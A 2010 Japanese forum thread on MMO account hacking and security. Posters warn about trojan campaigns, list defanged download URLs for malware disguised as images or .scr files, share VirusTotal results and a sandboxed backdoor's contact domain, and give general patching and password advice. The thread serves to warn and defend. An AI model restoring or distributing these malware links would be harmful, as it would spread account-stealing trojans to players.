www■geocities■jp/saibai8500/nexon■jpg■zip
zip > scr

scrをVirScanしてみる
http://www.virscan.org/report/2df7fa596790c6224e6bc18cb6e2e8af.html

VirusTotalだとカスペは今日付けで検出。
http://www.virustotal.com/analisis/1a994ca04aabcc79840a333473dbd02b897fb497c80a68271e39b3ca861a7050-1274769124

油断大敵とはよく言ったもの
気をつけてくれよな! <> (○口○*)さん<>sage<>10/05/25 16:57 ID:J03ael6E0<> >>918
>福建中華の動きが再び活発になってきた

どれどれとばかりに、saibai8500 でぐぐって、投下されているスレを見てきた。類似品でこんなんも。
(ろだにUPられている物の中でファイル削除済みだったものが他に3つ程)

tp://www■geocities■jp/pskskang01/nexon■jpg■zip
tp://loda■jp/asada_mao/?id=895■zip →file0050■zip
tp://loda■jp/script/?id=465■zip →modemvJPEG■lzh
tp://loda■jp/f3ssmod/?id=1611■lzh →modemvJPEG■lzh
tp://www■4gameranking■com/MS-JP■ZIP
tp://www■mgema■com/mpg■scr →404 Not Found(アドレス投下は5/24 20:52)
tp://aspstone-co■com/blog
 →複数のhtmlや拡張子偽装したスクリプトを経由
  →tp://www■yaplogjp■com/blog/c■exe(単独で名前が出てた/他のものも落としてるかどうかまでは知らない) <> (○口○*)さん<>sage<>10/05/25 17:14 ID:Auo+JjpJ0<> ↑Geoから消された模様。例によってscrは自己解凍rar。
解凍するとIE8■exe。
ttp://www.virustotal.com/analisis/ad26b769799ca382e331f6d012354762fbe17b46374fd7b72ffb64b50dc279c7-1274771871
AntiVir avast! AVG Dr.WEB Eset Jiangmin K7 Kingsoft Symantec Trendmicro に提出済み。

loda■jp/aion/?id=4655■lzh
Aion■scr。Upackなので手出しできず。
ttp://www.virustotal.com/analisis/c18d57f20953048458e6b127561d6b94fed35387bb5619ce769196e00e790c6b-1274763900
検出率は良好。スカったPandaと不明なK7に提出済み。 <> (○口○*)さん<>sage<>10/05/25 17:46 ID:Auo+JjpJ0<> >>919
一番上が新しそう。他は既出のmxd■exe。
ttp://www.virustotal.com/analisis/9295c686338b5328f53d1db2636cfb10b4e25d39adacc0b6134513e290a28ca7-1274776376
avast! AVG Eset K7 McAfee Sophos Symantec Trendmicro に提出済み。 <> (○口○*)さん<><>10/05/25 18:31 ID:6ABo48md0<> >>912
IDもpassも、複数のサイトで同じ物を使い回さないというのが重要。
そういった意味では、リスクを1ヶ所に集約できるOpenIDなども積極的に利用しておくべき。
仮にpassが漏れたとしても、認証局にあたるサイトのIDを停止、あるいはpass変更すれば他のサイトへの不正ログインも防げるから。 <> (○口○*)さん<>sage<>10/05/25 18:35 ID:N/76Lvbv0<> シングルサインオンの場合は、気づかずログインされているという状況に
陥らないための仕組みか、相応の自衛策が必要になるね。

それでもやっぱ、銀行やクレジットなんかのID管理は別だね。 <> (○口○*)さん<><>10/05/25 20:29 ID:UNqZmHkiO<> >>912のもののです
皆さんの言うのを総合すれば、IDは簡単なローマ字のままでも構わないという事でしょうか?
パスワードを強化またID、パスワードのセキュリティを強化した方がいいって事ですよね? <> (○口○*)さん<>sage<>10/05/25 20:37 ID:VSEn54cS0<> 今日のメンテで垢ハックくらった装備、ゼニーが戻ってきた
いまさらだけど詳しく書いたほうがいいかな? <> (○口○*)さん<>sage<>10/05/25 20:44 ID:J03ael6E0<> >>924
IDやパスワードの強化というのが、英数大文字小文字を取り混ぜて長くするという意味であれば、
ブルートフォース攻撃に対して破られにくくなります。それに価値がないとは誰も言いません。

しかし、アカハックトロイなどにより、通信の傍受やバックドアからの侵入、他のなにかとアカウントを共通にして
他のアカウントから芋ずる式に別のアカウントでも不正アクセスを許してしまうこと等の対策としては無力です。

「○○すれば大丈夫」「○○しなくても大丈夫」といった回答をここで得ることは無理です。
せいぜい、「□□の為には△△をするといい」という回答なら貰えるかもしれませんね。

「○○した方がいいですか」というあなたのような質問の仕方ですと、「やりたいならやればいいよ、無駄だとは
言わないから」という回答しかできません。なにを目的としているのかを明確にしないと、やろうとしていることが
見当外れかどうかの判断もできないのですよー。 <> (○口○*)さん<>sage<>10/05/25 20:44 ID:J03ael6E0<> >>925
まとめて書き込んで貰えると嬉しいな。 <> (○口○*)さん<>sage<>10/05/25 20:46 ID:wUT4prss0<> 戻される状態は既知の通りだし別にいいんじゃないの <> 925<>sage<>10/05/25 20:56 ID:VSEn54cS0<> 2009年4月に垢ハックされてることに気づく
キャラセレで頭装備なし、キャラパスも変更済みで被害確認できず

すぐサポセンに投稿、テンプレ回答。

色々ショックで一年放置。

2010年3月
キャラパス再発行してもらい被害確認。装備品、ゼニー根こそぎ無くなってた。

んで、県警に電話。
地元の警察署に相談してくれとたらい回し。

地元警察に相談し、アクセスログを調べてくれるとの事。

2010年5月
警察から電話、不正アクセスであると確認された。
んで、サポセン投稿。おなじみの3つの質問(ログインしていいか?等)
もちろん はい と返信


そして今日のメンテでアイテム、ゼニーを補填しましたと連絡あり。

ログインして確認するとアイテム、ゼニーが戻ってきてた。
アイテム全部は確認できないけどほぼ戻ってると思う。ゼニーも同じ。

装備とカードが分離して精錬値もリセットで戻るって報告例あったけどそんなことなく、カードも精錬値もそのままで戻ってきてた。

一年ぐらい前のやつだったけどちゃんともどってきたよーって報告。 <> (○口○*)さん<>sage<>10/05/25 21:22 ID:6RQEjQHr0<> なるほど <> (○口○*)さん<>sage<>10/05/25 21:28 ID:J03ael6E0<> 報告乙です。
カード剥がされなくなったってのは新しい情報かもな。 <> (○口○*)さん<>sage<>10/05/26 07:34 ID:RnFN9XAs0<> 不正改ざんサイトの内訳に変化。より多くの個人ユーザが攻撃対象になる可能性。
ttp://www.securebrain.co.jp/about/news/2010/05/gred-report10.html
「不正改ざんサイト」の内訳に変化、個人のブログが標的に
「不正改ざんサイト」の被害サイトの内訳にも変化が生じています。
2010年2月の時点では、企業サイト82.1%、個人サイト15.2%でした。
2010年4月には企業サイト63.7%、個人サイト25.1%です。
4月に収集した「不正改ざんサイト」の情報を基に、
各ウェブサイトのコンテンツについて調査を行ったところ、
企業のウェブサイトでは、特に定まった傾向はありませんが、
個人のウェブサイトでは90%以上が「ブログ」でした。 <> (○口○*)さん<>sage<>10/05/26 10:42 ID:IaJ0HltS0<> 福建中華のドメイン、昨年10月に登録して暫く寝かせていたようだ。
今年の3月ごろから攻撃に使用している模様。

jp■zzkk11■com

サーバは香港、ドメインWHOISはいつもの場所(福建竜岩)を指し示す。
今のところRO向けでは使われている気配はないけれど、罠文章やファイル名を変えたり、
ディレクトリ掘ったら踏む人がいないとも限らない。

気をつけてくれよな! <> (○口○*)さん<><>10/05/28 14:18 ID:qbPIV6zbO<> >>926
すみません
質問を変えます

簡易なローマ字のIDで
パスワードだけ複雑にすれば安心してプレイできるでしょうか?


※セキュリティ・パスワードを定期変更してるとします <> (○口○*)さん<>sage<>10/05/28 14:25 ID:ePHddGyB0<> 昨日の書き込みは吸収されちゃったんだけどまだ書けたのか

>>934
長文だからって読み飛ばすなよ
IDは正直あんまり関係ない
>>926のようにそれ以外の要因もあるんでパス変更だけで安心とは言えない <> (○口○*)さん<>sage<>10/05/28 15:05 ID:DpDSCr+D0<> >>934
やりたければやればいいよ、無駄とは言わないからw

パスワードを複雑化することで対応できるのはブルートフォース対策でしかないので、
他のセキュリティ破りの手法に関しては無力です。

なにを重視して、どこまでやるかは個人の判断で行ってください。(あくまでも自己責任です)

セキュリティに完璧、絶対に安全ということはありません。どこまでリスクを下げるべきか、
どこまでやるのが現実的かという判断になります。

ですから、
 >安心してプレイできるでしょうか?
という質問に対する直接的な回答は「いいえ」となります。(>926と言ってること変わらないけどw)

どんな対策をやっても、「安心ですか」と聞かれたら「はい」とは答えられません。
現実的な範囲で、可能な限りの対策を行ってください。 <> (○口○*)さん<>sage<>10/05/28 15:07 ID:akiu3pgc0<> 安心してプレイできるかできないかはあなたの気持ち次第かと
少しでも安心したいならワンタイムパスワードにしたら・・・? <> (○口○*)さん<><>10/05/28 16:31 ID:LJV8AeWDO<> 一年前の話しになるけどそのときは精錬値そのままのカード分離でかえってきた。
2垢分ハックされたんだけど餅は残ってたんだ。それをギルメンにばらまいたんだけど、アイテム返済後確認したら餅までかえってきててびびった、て話し。
知り合いはもちろんBANなどされてない。 <> (○口○*)さん<>sage<>10/05/28 21:38 ID:DpDSCr+D0<> 人間をコンピューターウイルスに感染させる初の実験、英研究者が自身の体で
http://internet.watch.impress.co.jp/docs/news/20100527_369790.html

なんてシュールな… <> (○口○*)さん<>sage<>10/05/29 03:42 ID:M5eQvlHy0<> アカウントハッキングかもしれない、と思ったので書き込みさせていただきます。

数日前からですが、ROを2回目以降起動する際にやたら時間が掛かるようになりました。
(初回は変化ないように思います)
そこで、通信ログを少し調べたところ、ちょっと不審なIPと通信しているのが分かりました。
IPチェッカーのサイトで見てもちょっとよく分からず、不安です

一応そのIPとの通信をルーターで遮断し、通常起動している別PCでガンホーIDの
パスワードを変えておきました。
その後数回起動してみましたが、接続しようとしている形跡も今のところは見られません。

ここ数日、RO関連のサイトは特に見ていません。公式のSNSくらいかな。
SNSからも特にURL踏んでどこかに飛んだと言う事もないです。
なので、もしアカウントハッキングなら、どこで引っかかったのか分かりません。

とりあえず通信しているIPを公開しておきます。
全く無関係のIPだったらすみません。

125.54.154.121 KD125054154121.ppp-bb.dion.ne.jp <> (○口○*)さん<>sage<>10/05/29 03:47 ID:M5eQvlHy0<> 追記です。というか、テンプレのコピペを忘れました。

【      気付いた日時          】 (ここ2〜3日の間)
【不審なアドレスのクリックの有無 】 (特にないと思われます)
【他人にID/Passを教えた事の有無】 (No)
【他人が貴方のPCを使う可能性の有無】 (No)
【    ツールの使用の有無      】 (Yes:SSさんのみ使用しています)
【  ネットカフェの利用の有無    】 (No)
【     OS    】 (Windows7 Home Premium)※バージョンは良く分かりませんでした。
【使用ブラウザ 】 (Sleipnir2.9.3)
【WindowsUpdateの有無】 (クリーンインストールが2週間前で、その後していません)
【 アンチウイルスソフト 】 (ウィルスバスター2010)
【その他のSecurty対策 】 (特に無し)
【 ウイルススキャン結果】 (特に何も出ませんでした)
【スレログやテンプレを読んだか】 (Yes)
【hostsファイルの変更】(無)
【PeerGuardian2の導入】(無)
【説明】 (前述のとおりです) <> (○口○*)さん<>sage<>10/05/29 07:55 ID:ry+gb+tn0<> >>940-941
ごめん、わたしには、あなたがなぜ不審に思ったのかが理解できない。
アカウントハッキングを疑う理由も理解できない。

>そこで、通信ログを少し調べたところ、ちょっと不審なIPと通信しているのが分かりました。
>IPチェッカーのサイトで見てもちょっとよく分からず、不安です

ログを調べるのに、どんな手法を使って、どういったログが出てきたのか書いて欲しい。
単にポートスキャンされていただけとか?

>125.54.154.121 KD125054154121.ppp-bb.dion.ne.jp

単なるKDDI配下のIP。


アンチウイルスソフトのパターン更新をしっかりやっておけ、PG2(現在はPeerBlock)の設定でもしとけ。
PCが遅くなる原因自体を探して解決しとけ。心配ならOSの再インストールでもしとけ。

このくらいしか助言できることはないと思うけど。 <> (○口○*)さん<>sage<>10/05/29 08:23 ID:1iyb5ICc0<> 2日だと普通にwindowsの更新関連の気が <> (○口○*)さん<>sage<>10/05/29 08:25 ID:1iyb5ICc0<> メッセ使ってるならそんなIPとやり取りしてても可笑しくない
そのIP遮断しても多分すぐ違うIPになるから無意味 <> (○口○*)さん<>sage<>10/05/29 09:20 ID:mg35eISJ0<> tcpmonか何かで、通信してるプログラムを割り出しておこう。

skypeってオチはナシでな! <> (○口○*)さん<><>10/05/29 11:29 ID:VIrZkenX0<> zoomeのBitTorrentDNAとかじゃないの? <> (○口○*)さん<>sage<>10/05/29 11:32 ID:M5eQvlHy0<> レス頂いた人ありがとうございます。一応考えを述べておきますね。

>>942
ROを立ち上げた瞬間のみそこと通信していた、ということで、もしかしたら・・・と思ったのです。
以前同様の症状でアカハック食らった経緯があるので・・・過剰反応だったかもしれません。

ウィルスのパターンファイルは更新済み。p2pはやっていません。
遅くなる原因はもう少し調べてみます。

>>943
windows更新でkddiにアクセスするんですか?

>>944
メッセは立ち上げてません。
IP変わってまだ症状出るようならもう少し調べてみます。

>>945
TCPMONで上記IP並びに通信のタイミングなどを調べたのですが、プログラムの割り出しは
ちょっとメモ忘れなどがありました。不足ですみません。
まだ併発するようなら調べておきます。
ちなみにskypeやメッセなど、直接相手とつながるようなアプリは立ち上げてないと思います。 <> (○口○*)さん<>sage<>10/05/29 11:37 ID:M5eQvlHy0<> >>946
zoomeも特に見てないです。
一応見たことはあるので確認してみましたが、プロセスやProgramFilesの中にも無かったので
大丈夫かと思います。 <> (○口○*)さん<>sage<>10/05/29 12:35 ID:ry+gb+tn0<> >ROを立ち上げた瞬間のみそこと通信していた、ということで、もしかしたら・・・と思ったのです。
それは確かに変だが、本当にそのタイミングで不審なプロセスが通信していたかどうかを判断するには
あまりにも情報不足。

取り敢えず、"複数の"セキュリティソフトのオンラインスキャンで、不審なものがないかどうか
確認するのが先決かな。Gumbler系は、踏んだ自覚なんかなしに動くだろうし。
(AcrobatReaderのスクリプトは切っとけよ。更新もしとけ)

あとは、見知らぬIP(?)に通信していたプログラムの特定をしないと、不安を感じるべきケースか判断できない。

>遅くなる原因はもう少し調べてみます。
PC Matic でも使ってみな。診断までは無料だし、診断した後の対処は、その辺のFSW組み合わせてやりゃいいよ。
http://www.forest.impress.co.jp/docs/review/20100311_353611.html <> (○口○*)さん<>sage<>10/05/29 12:54 ID:1iyb5ICc0<> 心配するのにウイルスバスターは貧弱な気がしなくも無い <> (○口○*)さん<>sage<>10/05/30 05:14 ID:zJNvpTd10<> なんでそんなに食いついているのか分からんのだけど…

こんなのがありました。(自分では)不審に思ったんで止めました って報告じゃないの?
変なの止めてるのが分かる人なら「あぁ・・・この子かわいそうな子なんだ」で終わりだし
全然分かんない人は「そういう探し方もあるんだなぁ」程度の話じゃねーか。

そもそも>>947にあるように報告主も聞く気ねーし。叩き台にもなってないだろw <> (○口○*)さん<>sage<>10/05/30 07:43 ID:LqLQhKbs0<> 変な相談主は、進展なさそうだからその辺に置いといて、テンプレに変更必要な箇所あるかどうか話し合おうぜ。

取り敢えず、PG2を削除して、まるっとPeerBlockに置き換えちゃってもいいと思うんだけどどうかな。 <> (○口○*)さん<>sage<>10/05/30 08:48 ID:nR9LIhD40<> 個人的にまだPG2を使っていて、けっこうテンプレのリンクから飛ばせてもらってるんで
できれば並記(旧バージョンと明記?)という形で残しておいてもらえるとうれしい

個人的にはアドレスの置き換えミスがまだ数件見られることから
>>2に「http://www■mmobbs■com/akahakku■html」みたいな例文を載せたいところ
あと
>【その他のSecurty対策 】
テンプレのこれがスペルミスw
>【PeerGuardian2の導入】
ここはもうPBに置き換えても良いと思う

>>4はPG2とPBの順番を入れ替えた方がいいかもしれないな
ちなみに、オンラインスキャンにシマンテック(ノートン)とバスターがないのは意図してなのかな?

あとは、適宜、検体の提出先を更新する感じで <> (○口○*)さん<>sage<>10/05/30 12:11 ID:ED8dwO1I0<> アラドスレに福建中華の新型投下を確認。

loda■jp/aion/?id=4669■scr
誘引文:量産型魔娘・その後
誘引文はAIONアップローダーに2009年8月にUPされたjpgファイルの説明をパクったもの。

scrそのものをVirusTotalにかけてみる (17/41)
www.virustotal.com/analisis/0ea4a97fd7618474b222349b412c8c7e8224807d9341d997f6acbe73436a5be5-1275187168

*scrの中身、計5ファイルでうち1つだけ反応を示すものがある
(scrで反応をしなかったマカフィーのGW版のみ反応)
.data (0/41)
.rsrc (0/41)
.rdata (0/41)
量産型魔娘・その後 (0/41)
.text (1/41)
www.virustotal.com/analisis/df1d9635733e0fffb66dc34175a094974b1b19aaec1cb2da41076d2b9af68a68-1275187365
検出名:Heuristic.BehavesLike.Exploit.CodeExec.EPLG


どういう作りなのかはよく分からんけど気をつけてくれよな! <> (○口○*)さん<>sage<>10/05/30 19:56 ID:W5Bmng0Y0<> textやdataやrsrcはexeのセクションだから
バラしてスキャンしても意味ないよ。
砂箱に投げたところ caizibing■com/xinip.txt に接続。
いつものバックドアな感じ。 <> (○口○*)さん<>sage<>10/05/30 20:33 ID:W5Bmng0Y0<> priusロダでも同一バイナリを確認。
a-squared AntiVir Jiangmin K7 Kaspersky Kingsoft McAfee
Microsoft Rising Sophos Symantec Trendmicro に提出。 <> (○口○*)さん<>sage<>10/06/01 06:43 ID:jk1VM4EJ0<> アラドロダでIE8型のファイル確認
loda■jp/arad/ 127■scr(file0050■scr)

展開すると
file0050■scr > IE8■scr

IE8をVirusTotal
www.virustotal.com/analisis/2acfb147a80ff754daedd9161593326348cea1c949d9bad0889fab038f9d57e1-1275341566

主たる物で検出はAvira、マカフィーくらい?

954といいここのところ攻撃目標がハンゲにコンテンツにあるのがメイン。
ハンゲにコンテンツがあるアラド、メイプル、ECOやTW関連掲示板などはよく攻撃されているね。

気をつけてくれよな! <> (○口○*)さん<>sage<>10/06/01 09:49 ID:6LCpxUWw0<> >>957
伏せ方がおかしい。スレ内で使われている他のと同じように、こういう表記にして貰えると有り難い。
あとVirusTotalへのリンクは、http://を削る必要ないから。

tp://loda■jp/arad/?id=127■scr <> (○口○*)さん<>sage<>10/06/01 10:12 ID:jk1VM4EJ0<> >>958
ごめんごめん、自分の掲示板ではURLの頭を丸ごとNGにしている所為かつい癖で。

9:30にはこんなものも投下された
tp://loda■jp/arad/?id=129■lzh
lzh > scr > mxd■exe

テキストは同じアップローダーに2009/01/08にUPロードされた画像ファイルのものをパクったもの。

またカスペ回避するべく作り変えたらしい
(17/41)
http://www.virustotal.com/analisis/cd228c08654f5e9de6659561030f2eac4433043db18e9ed86559ef46e497d974-1275353957

用心用心
気をつけてくれよな! <> (○口○*)さん<>sage<>10/06/01 14:24 ID:SX96zp2M0<> 前に書き込みが闇に吸収されちゃったのは
virustotalのURLをhttpやttpから入力してしまって
リンクされる1行が長すぎたからかと思ったんだけどそうじゃなかったらしい
アレは一体なんだったんだ
次の日に投稿してもそれだけはダメだったし・・・ <> (○口○*)さん<>sage<>10/06/01 15:20 ID:xF6vLm4O0<> ここはscrの前にピリオド付いてると消えた気がする(他の拡張子もあり?)。 <> (○口○*)さん<>sage<>10/06/01 15:25 ID:SX96zp2M0<> なるほどthxです
VirusTotalの結果にファイル名書いちゃったのが誤りだったのね
もろにscrとexeでした
恬り岷し徴弟■scrとか <> (○口○*)さん<>sage<>10/06/01 16:05 ID:xF6vLm4O0<> >>957-959
主だったとこに提出しました。 <> (○口○*)さん<>sage<>10/06/01 23:55 ID:do9pq4dB0<> 一太郎の脆弱性を悪用した不正なプログラムの実行危険性について
ttp://www.justsystems.com/jp/info/js10002.html

一太郎2004〜一太郎2009が対象
回避パッチが公開されているので詳細は各自見てくれ <> (○口○*)さん<>sage<>10/06/02 01:08 ID:XZ+gwtjp0<> SecuniaPSI、昨日新しいの出たからうpでーとしろって通知が来てた <> (○口○*)さん<>sage<>10/06/02 12:51 ID:zfeFg2nX0<> ATOK11,一太郎8の俺に隙はなかった <> (○口○*)さん<>sage<>10/06/02 13:24 ID:o71guFnd0<> どこの古代財産だよ <> (○口○*)さん<>sage<>10/06/02 15:05 ID:zfeFg2nX0<> win95bか95cあたりのBIBLO(富士通ノート)の遺産だな・・・w
当時は銀じゃなく黒ボディで、CD単独再生機能が無かったから安定していたんだぜ! <> (○口○*)さん<><>10/06/02 15:16 ID:/WBVTLbA0<> WXG4の俺にもまるで無関係だ <> (○口○*)さん<>sage<>10/06/02 18:30 ID:9EMtXsYb0<> WXG4.03の俺にもやっぱり無関係だな。こいつのおかげで64bitOSに乗り換えられないのが問題だがw <> (○口○*)さん<>sage<>10/06/04 11:27 ID:q/dUKaI80<> 次スレどうする?>>970 <> (○口○*)さん<>sage<>10/06/04 13:30 ID:jWZDaiVp0<> あー、踏んでたか。>980辺りまででテンプレ修正箇所話し合ってから立てるよ。
ここんとこ流速遅いから、立ててもこっちが埋まるまでに新スレ落ちそうで恐いわw

修正箇所は>952-953辺りのPeerBlockの他になにかあるかな? <> (○口○*)さん<>sage<>10/06/04 14:23 ID:5KiJggXx0<> アンチウイルスに何を使っているかより
FlashやJavaやReaderの有無・バージョンが欲しいかな、個人的には。 <> (○口○*)さん<>sage<>10/06/04 16:09 ID:AfYUMMy+0<> WindowsUpdateの確認よりMicrosoftUpdateのほうがいいね
別スレで同じだと思ってた人がいたからWindowsUpdateとは違うってことも
併記しないとわかりにくいかもしれない <> (○口○*)さん<>sage<>10/06/04 22:58 ID:jWZDaiVp0<> 危険URLの伏せ方の例載せといたほうがいいって話あったよね。どこら辺に突っ込んだらいいかな?
>>2の末尾に、こんなん書く位でどうだろう?

※ 不審なアドレスを記載する時は下記のように置き換えてください。
 http://enif.mmobbs.com/test/test.exe → tp://enif■mmobbs■com/test/test■exe


>>973-974
その辺はもう入ってるね。WindowsUpdateとMicrosoftUpdate併記して違いを説明する必要があるかどうかは疑問。
1行増やすだけの価値あるかな?

>5
>【安全対策の簡易まとめ】
>以下は要点となります。詳しくは関連サイトを見てください。
> ・定期的なMicrosoftUpdate及び、各種ソフト(各種Player、Reader等)のアップデートを行う。

 ・定期的なWindowsUpdate及びMicrosoftUpdateを実行し、重要な更新を全て実行する。
 ・各種ソフト(FlashPlayer、Acrobat Readerは特に重要)のアップデートを行う。
 ・Adobe Acrobat Readerの環境設定から、JavaScriptの項目を選び、「Acrobat JavaScriptを使用」のチェックを外す。

> ・パーソナルファイアウォールソフトの導入する。
>   ・hostsの利用した危険ドメインのブロック
>   ・PeerGuardian2を使った危険IPのブロック など

 ・パーソナルファイアウォール以外にも、各種ブロックソフトを活用する。
   ・hostsの利用した危険ドメインのブロック
   ・PeerBlockを使った危険IPのブロック など <> (○口○*)さん<>sage<>10/06/04 23:00 ID:jWZDaiVp0<> 置き換えのところは、この方がわかりやすいか。

※※※ 不審なアドレスを記載する時は置き換えを忘れずに(重要) ※※※
 ○:tp://enif■mmobbs■com/test/test■exe
 ×:http://enif.mmobbs.com/test/test.exe <> (○口○*)さん<>sage<>10/06/04 23:06 ID:jWZDaiVp0<> >>8の追加候補
 >・都道府県警察本部のサイバー犯罪相談窓口等一覧
  >>3の対策参考情報辺りが適切だと思うけど、入れなくてもいい気がする。
 >・DriveImage XML Backup Software - Data Recovery Product
  こっちは紹介する必要性を感じないなあ。バックアップは大事なんだけど、ここに相談にくる人は手遅れの人たちだから無意味。
 >レスキューCDでのマルウェアスキャン
  >>4-5のオンラインスキャンと比重的には同じ気がするけどどうしたものか。
  次スレにも、追加候補のままで残しておきますかね? <> (○口○*)さん<>sage<>10/06/04 23:14 ID:jWZDaiVp0<> >>4のソースチェッカーも削除だね。なくなってるし。今まで有り難うございました。(代わりのものあれば紹介してくれ)

>>7も微妙だなぁ。>8と引っくるめてテンプレ外の補足情報にしとくか。

現行テンプレ
>・ このスレでよく出てくるアプリケーションやサイトとオンラインスキャン (>>4)
>・ 安全対策の簡易まとめ、アカウントハック対応の要点とFAQ (>>5,>>6)
>・ その他関連(>>7)

修正案
・ このスレでよく出てくるアプリケーションやサイトとオンラインスキャン (>>4-5)
・ 安全対策の簡易まとめ、アカウントハック対応の要点とFAQ (>>5,>>6)
・ その他関連情報(>>7-8) <> (○口○*)さん<>sage<>10/06/05 00:26 ID:rJmqbU9u0<> >>975
ああごめんよ
質問テンプレがWindowsUpdateのままなのが気になったの

現行
> 【WindowsUpdateの有無】 (一番最後はいつ頃か、等)

修正案
【MicrosoftUpdateの有無】 (MicrosoftUpdateなのかWindowsUpdateのみか、一番最後はいつ頃か、等) <> (○口○*)さん<><>10/06/05 02:58 ID:Wor14Woy0<> >>976
置き換えの例示は、example.comを使った方が良いかもしれません。
実在するドメインを含んだURIの場合、クラックなどで設置されてしまう可能性は0とは言えないので。
(無論、MMOBBS自体がクラックされてしまうと言っている訳ではありません) <> (○口○*)さん<>sage<>10/06/05 03:16 ID:TbZifqJK0<> >>977
>ここに相談にくる人は手遅れの人たちだから無意味。

テンプレは書き込む人だけでなく新参やROMへの情報提供という役割もあるから
予防と事後対処の区別を付けつつ残すのがいいと思う

>>980
同意
ただ理由はちょっと違って、URLが一人歩きしようとも例示であることが自明になるから <> (○口○*)さん<>sage<>10/06/05 22:11 ID:Hk7gqvOw0<> またFlash PlayerとAdobe Readerに脆弱性だってさ
ttp://www.adobe.com/support/security/advisories/apsa10-01.html <> (○口○*)さん<>sage<>10/06/05 23:37 ID:13xxy0jL0<> アカウントハック対策・セキュリティ 総合スレ Lv.6
http://enif.mmobbs.com/test/read.cgi/livero/1275747054/

指摘の出たものを一通り反映させてみたつもり。さらに修正する箇所あれば(確認してないリンク先とかもあるし)
新スレで指摘して貰えれば、次のテンプレ修正検討時にチェックできると思う。

>>953
PG2の説明は殆ど削らずに残してあるけど、次スレでは圧縮されるかも?
 >ちなみに、オンラインスキャンにシマンテック(ノートン)とバスターがないのは意図してなのかな?
独断と偏見により、いらないと判断。一応、新スレの>8に入れてあるけど、他の奴で事足りるかと。 <> (○口○*)さん<>sage<>10/06/07 09:18 ID:XF27UiDC0<> マイクロソフト、6月の月例パッチは“緊急”3件を含む計10件
http://internet.watch.impress.co.jp/docs/news/20100604_372183.html

6/9公開予定なのでWindowsUpdateを忘れずにね。 <> (○口○*)さん<>sage<>10/06/07 11:15 ID:/94J1tk80<> AdobeのFlash Player、Reader、Acrobatに未修正の脆弱性、悪用攻撃も多発 - ITmedia News
http://www.itmedia.co.jp/news/articles/1006/07/news012.html <> (○口○*)さん<>sage<>10/06/07 11:51 ID:XF27UiDC0<> UNLHA32.DLL開発停止で、LZH形式の余命はあとわずか?
http://internet.watch.impress.co.jp/docs/yajiuma/20100607_372657.html

◇Unlha32.dll等開発停止、LHA書庫の使用中止呼びかけ
http://slashdot.jp/~Claybird/journal/508709
◇お知らせ(Micco's HomePage)
http://www2.nsknet.or.jp/~micco/notes/ann.htm <> (○口○*)さん<>sage<>10/06/07 12:00 ID:XF27UiDC0<> あ、そんな訳で、UnLha32.dll が6/5付で出てたりして。

LZH 書庫のヘッダー処理における脆弱性について (2010 年版)
http://www2.nsknet.or.jp/~micco/vul/2010/mhvi20100425.htm

>UNLHA32.DLL
> 巨大なヘッダーによるバッファーオーバーフロー発生の脆弱性については対応が行われており, 次のような処理を行います:
>LHMelt (LMLzh32.DLL)
> 巨大なヘッダーによるバッファーオーバーフロー発生の脆弱性については対応が行われており, 次のような処理を行います:

現状、lzhは、7z解凍、7zで対応してない自己解凍のものだけLHMeltで解凍してる。
LHMeltは(右クリックメニューの送るに突っ込んでるけど)、右クリックからの解凍とかできなくてちょっと面倒臭いんだよね。 <> (○口○*)さん<>sage<>10/06/08 08:50 ID:NHuOTRFg0<> お客様のプレイオンラインIDに関する重要なお知らせ
ttp://www.playonline.com/ff11/polnews/news19198.shtml
「PlayOnline.com」で情報漏えい
ttp://internet.watch.impress.co.jp/docs/news/20100607_372707.html

アタック受けてたそうで <> (○口○*)さん<>sage<>10/06/09 09:20 ID:Xg2AkJkm0<> 次スレ、そろそろ保守した方がいいんだろうか? <> (○口○*)さん<>sage<>10/06/09 22:51 ID:Xg2AkJkm0<> Flash Player脆弱性修正版を10日までに公開、Adebe Readerなども29日までに
http://internet.watch.impress.co.jp/docs/news/20100609_373028.html


次スレに出てる話題だけど、既存スレ使い切ろうということでこちらに投下。 <> (○口○*)さん<>sage<>10/06/10 08:38 ID:jgWeRiHt0<> >>986-987
lzh形式について、Vectorから「lzh形式でファイルを登録されている作者の皆様へ」というメールがきた。
ベクターでは、既存のものはそのまま公開。6/14以降、「新規・差し替え・追加登録」のLZH形式は禁止と
いうことになったようです。メール中に記載があったのですが、Micco氏の今日の出来事(6/2)に6/7付の
更新情報が出ました。

ttp://www2.nsknet.or.jp/~micco/incidents/2010/inci1006.htm

>Jun.7,2010 追記
> 援護射撃があったからなのか, なにやら微妙に趣旨が追加・変更されて JVNVU#545953 の追加情報として
>扱う形に落ち着いたようです。 いや, 確かに元々「参考情報として扱う (何のとは示されていない。)」とは聞いて
>いましたけれど。 それはともかく, CVE-2010-0098 に直接結びついた JVNVU#545953 に情報追加したのでは,
>ベンダーを含めて混乱するだけのような気がしないでも…。 とりあえずは様子見ですね。
>
> あと, 確かに「開発中止」とは叫びましたけれども, 投げたのは新型・新機能追加版のほうであって, 現行版の
>メンテナンスや約束した (約束しちゃった…が正解?) UNLHA32.DLL の 64 ビット版のほうは続けます, 念のため。
>お勧めは出来ませんが, 既にそれで動いてしまっている方面もありますので, 出さないといけないのでした。

取り敢えず、LHMelt辺りを使ってる分にはメンテナンスされるでしょうし、問題出なさそうですねぇ。
第三者のアーカイバ使う分には、どうだかわかりませんが。 <> (○口○*)さん<>sage<>10/06/10 18:46 ID:jgWeRiHt0<> PeerBlockのr404+が出たようです。安定版の更新も近そうだとかなんとか。

PeerBlock Download
ttp://www.peerblock.com/releases


PeerBlock日本語化パッチ
ttp://live28.2ch.net/test/read.cgi/download/1276104298/13

>13 :[名無し]さん(bin+cue).rar:2010/06/10(木) 16:11:35.43 ID:dv7WWDga0
>PeerBlock 1.0_r404 用パッチのみ(本体はHPよりPeerBlock 1.0+ (r404) Installerを。 ZIP版でもOK)
>DLパス block
>
>XP/VISTA/WIN7 32&64bit ALL
>
>ttp://www1.axfc.net/uploader/Sc/so/122367.zip
>
>自分の環境はXP 32bitのみです。
>上記環境にてZIP版にて日本語化し、MD5チェックでパッチファイル適用出来る事だけは確認しています。
>XP32bitでは表示、動作確認できていますがそれ以外は表示、動作未確認なので、
>使用される方はその事を了承の上でお願いします。
>一部エラー表示など日本語化していないところもあります。

PeerBlock@Wikiへの反映は、まだ行われていないようです。
ttp://www40.atwiki.jp/peer_block/ <> (○口○*)さん<>age<>10/06/10 18:47 ID:jgWeRiHt0<> 一応、情報更新ageということで。

